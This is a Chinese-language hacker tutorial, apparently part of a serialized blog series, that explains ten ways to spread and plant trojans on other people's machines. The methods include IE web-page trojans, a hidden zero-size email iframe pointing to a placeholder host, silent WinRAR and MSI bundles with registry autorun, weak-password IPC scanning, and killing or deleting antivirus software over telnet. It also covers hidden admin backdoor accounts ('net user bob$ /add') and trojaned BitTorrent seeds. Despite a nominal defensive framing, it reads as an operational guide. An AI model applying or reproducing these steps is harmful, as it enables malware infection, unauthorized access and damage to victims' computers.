黑客教程六：木马传播技术

黑客教程六：木马传播技术

木马的原理和使用其实是很简单的，但问题是我们如何让我们的木马能够种植到别人的机器上呢？

　　要知道如果不能在别人计算机上种植木马，那就只能在自己机器上自娱自乐了。接下来我就介绍一些黑客常用的木马种植技术，希望大家能通过学习增强防范木马的意识，尽量避免以下的一些问题。

 

第一招：网页木马制作。

　　由于目前上互联网的人往往都要使用IE这个软件，所以黑客们都把很多的经历投入到了 IE的研究上。结果就是IE的漏洞不断的被爆出。关于漏洞的具体问题，我们在后面的章节再介绍。这里我们提到的就是一种可以远程执行的漏洞，简单的说，就是你看了我的网页，由于你的IE有漏洞，就会自动执行我所指定的那个文件，如果这个文件是木马，你就惨了。

 

　　有人把这种攻击方式形象的比喻成“网页挂马”，再加上跨站技术，弄得现在都人心惶惶的。（用firefox上网，危险小得多）

 

　　不过，大家可能也会有疑问：就咱这水平，连个HTML都不会写，怎么挂啊？迷糊。这就 要感谢网络上的那些高手了，他们不辞辛苦的为我们写了很多漏洞利用程序。比如：老丁网页木马生成器。（大家看到笔记时，可能这个漏洞早就被多数人补上了，不过没关系，类似漏洞不断的爆，类似软件不断的出，用法差不多）。使用过程如下：

1、准备一个空间

2、配置好马儿，假设名字为mm.exe

3、打开老丁，输入http://你的地址/ma/mm.exe，再点生成网页。

4、把生成的网页laoding.htm传到服务器上，再把mm.exe传到ma这个子目录。

　　这样，只要有人访问laoding.htm这个网页就会中马啦。

第二招：邮件携带

　　用方法一做好的木马传到空间上以后，就可以在写邮件的时候，选择HTML编辑方式（如果是outlook，新建邮件时点“察看”-“编辑源文件”，foxmail你自己找找看），再加入以下内容，实现在网页中包含一个框架：
"<iframe src="  http://xxxxx.com/xxxx.htm" ; width="0" height="0"></iframe>"，这招够阴毒。以前试过这一招，挺好用的。

　　不过，这一招也有些问题。目前的SMTP在发信时都会把包含这个框架的邮件过滤掉。所以我们只能自己创建MAIL服务器了。好在Mdaemon很好用，大家安装配置完在安全菜单中把框架过滤那个勾去掉就行了。用你自己的SMTP发信吧！

 

第三：在flash文件中捆绑
　　打开flashMX，新建影片或打开其它影片(.swf)，创建一个空白关键帧，选择动作－浏览器－双击geturl，输入网页地址，再点动作－影片控制－停止动作，导出电影文件即可。FLASH没怎么用过，这回才知道，原来看flash也要小心啊。

第四：视频传播
　　用realmedia editor，工具－合并事件  事先写个文本文件，内容是: u 00:5.0 00:8.0 网马网址，这样就可以了。

第五：文件捆绑
　　不说了，工具太多。把一个正常的文件和木马捆绑在一起，在找个图标掩饰一下就行。但我要说的是：无论如何，捆绑后的扩展名都一定是".exe"。

　　如果大家没有工具，也可以用winrar捆绑。方法是把正常文件和木马放在一，记录两个文件的名字。然后把两个文件都选中，右键－添加到压缩文件。再选中“创建自解压文件”。然后在“高级”-“自解压选项”中，写好压缩前运行的文件（正常文件），写好压缩后运行文件（木马），再选静默模式中的全部隐藏就行了。

 

第六：通过MS较新的软件安装包MSI也可以捆绑木马

　　1、取得正常安装后的文件，最好使用软件的绿色版，把所有文件和木马文件放在同一个目录。

　　2、使用advance installer，到霏凡可以找到crack版。新建工程，选择专业版－新建工程向导，点击下一步、浏览选择准备好的目录。

　　3、有快捷方式的选择地方，把软件包中的主程序勾选，软件语言据实填写。

　　4、最后一步，绝对不要选：现在创建。这样就会进入下一步，软件的主程序界面。

　　5、选“文件或文件夹”，点开“windows volume”，新建一个system32，再把木马拽过去，这样MSI安装完成后，木马会自动放在这个目录中。

　　6、选“注册表”，在HKCU-software-microsoft-windows-current version-run中加载提到的木马文件即可。（当然，如果系统中安装有瑞星这样可以监控系统注册表的软件，安装到此步时会出现提示。）

　　7、如果木马支持服务启动，也可以在服务－安装服务上点右键－新建服务初始化，

　　8、在左侧菜单选“自定义操作”，在安装执行顺序下的install上右键，选新建安装的自定义操作，选中木马文件，选“异步执行，不等待返回”，这样可以避免安装出现延迟，在执行选项中选确认（绝不能选立即执行）。

　　9、F7生成工程文件即可。

第七：配合扫描工具
本例可以使用流光，也可以使用傻瓜IPC扫描器。
　　1、用流光扫描有IPC漏洞的计算机（就是设置了弱密码计算机）
　　2、扫描完成后，点工具菜单－IPC工具－种植者
找到配置好的木马文件－再选中木马种植的路径－出现提示“指定的程序将在＊＊秒后执行”
　　3、等待肉鸡上线即可。
　　注：本实验成功机率较小，2003　2000等系统为防止有人加自动运行程序，作了保护。如果目标主机上有杀软，也会杀掉木马。如果目标主机没有隐含共享，也没有其它共享目录，则更无法实现。

第八：手工开telnet种植
　　1、最简单就是用阿D工具包，找到其中的肉鸡扫描，找到弱密码的肉鸡后，点：打开telnet服务。　　　　　　
　　2、把查看进行和删除进行的两个程序：pslist.exe   pskill.exe  以及木马文件上传到一个FTP服务器。
　　3、telnet x.x.x.x           "telnet连接目标主机

　　通过ftp连接到放了好多黑客软件的服务器。ftp y.y.y.y
　　mget *            "下载所有文件
　　pslist           查看所有进程
　　pskill           杀掉杀毒软件进程

　　如果杀毒软件实现关不掉（许多杀软有进程保护机制），就只好做我们最不忍心的事儿了（删除杀毒软件的所有文件，再重启他的机器）
　　4、执行木马

    5、留下后门，大家可以用以下的方法，但最好还是克隆一个管理员帐号，如果不会，就baidu一下，网上很多说明。
　　net user bob$ /add
　　net localgroup administrators bob$ /add

提示：如果关闭了ipc$共享，或对方计算机密码无法破解，此办法无效。另外，针对于不是空密码的简单密码，可以考虑在扫描工具中配合事先生成的字典。

　　第九：BT捆绑
　　1、掌握一个最新最受欢迎的电影，用以下方法之一进行捆绑
　　文件捆绑器：缺点易被发现扩展名的问题。
　　文件欺骗法：制做N个EXE文件，有的绑木马，有的不绑。
　　2、用bt软件生成种子
　　3、到网站推介种子，将来下的人越多，中马的人越多。

　　第十：蜜罐种植法

　　在计算机上开一个guest可访问的共享，里边放一些捆绑了木马的文件，然后就等着一些小鸟进洞吧！！！

 

　　以上提到的方法还远没有把黑客种马的技术说完全（笔者水平也就这样儿了），所以黑客们的欺骗手段真的是防不胜防。所以，大家一定要擦亮眼睛。中个马不要紧，但作为一名IT专业人士，咱可丢不起那人啊。

　　好了，这一章就到这里，敬请关注连载。